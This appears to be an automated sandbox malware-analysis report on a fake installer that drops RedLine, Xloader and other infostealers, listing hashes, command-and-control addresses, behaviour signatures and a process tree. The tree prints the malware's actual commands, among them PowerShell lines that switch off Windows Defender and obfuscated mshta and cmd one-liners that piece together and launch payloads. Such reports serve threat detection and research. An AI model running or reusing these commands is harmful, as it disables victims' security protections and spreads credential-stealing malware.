Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
1399s -
max time network
1810s -
platform
windows11_x64 -
resource
win11 -
submitted
27-10-2021 05:03
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
media25
C2
91.121.67.60:23325
Extracted
Family
redline
Botnet
ChrisNEW
C2
194.104.136.5:46013
Extracted
Family
xloader
Version
2.5
Campaign
s0iw
C2
http://www.kyiejenner.com/s0iw/
Decoy
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
Signatures
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Windows security bypass 2 TTPs
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 40 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 11 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 19 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in Program Files directory 28 IoCs
-
Drops file in Windows directory 37 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 29 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 59 IoCs
-
Kills process with taskkill 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 9 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: MapViewOfSection 7 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 32 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 63 IoCs
-
Suspicious use of SendNotifyMessage 57 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue09c257807a702a4.exeTue09c257807a702a4.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"C:\Users\Admin\Pictures\Adobe Films\8wixEKYkU3LAxAJFOjsTzj6U.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe" -Force8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"C:\Users\Admin\Pictures\Adobe Films\51hnPAwNG7NjkLVKY_TSaycw.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1phdChzdGYsbzdQSL7S8qbXG.exe"C:\Users\Admin\Pictures\Adobe Films\1phdChzdGYsbzdQSL7S8qbXG.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\NLSKXAzQFqcD5othJip8lEJV.exe"C:\Users\Admin\Pictures\Adobe Films\NLSKXAzQFqcD5othJip8lEJV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 28010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\zhangm-game.exe"C:\Users\Admin\AppData\Local\Temp\zhangm-game.exe"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"12⤵
- Kills process with taskkill
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"9⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4944 -s 170410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GBLUO.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-GBLUO.tmp\setup.tmp" /SL5="$4030C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JSVOK.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-JSVOK.tmp\setup.tmp" /SL5="$80336,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT12⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-R7IAM.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-R7IAM.tmp\postback.exe" ss113⤵
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart13⤵
-
C:\11b57b19deb0e6b21c42\Setup.exeC:\11b57b19deb0e6b21c42\\Setup.exe /q /norestart /x86 /x64 /web14⤵
- Loads dropped DLL
- Checks processor information in registry
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471815⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst2.exe"C:\Users\Admin\AppData\Local\Temp\inst2.exe"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1b4,0x1b8,0x1bc,0x12c,0x1c0,0x7ff65a4e9e70,0x7ff65a4e9e80,0x7ff65a4e9e9013⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:212⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=1784 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2632 /prefetch:112⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2612 /prefetch:112⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2456 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2908 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3240 /prefetch:212⤵
- Modifies registry class
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2484 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2796 /prefetch:812⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=1876 /prefetch:812⤵
-
-
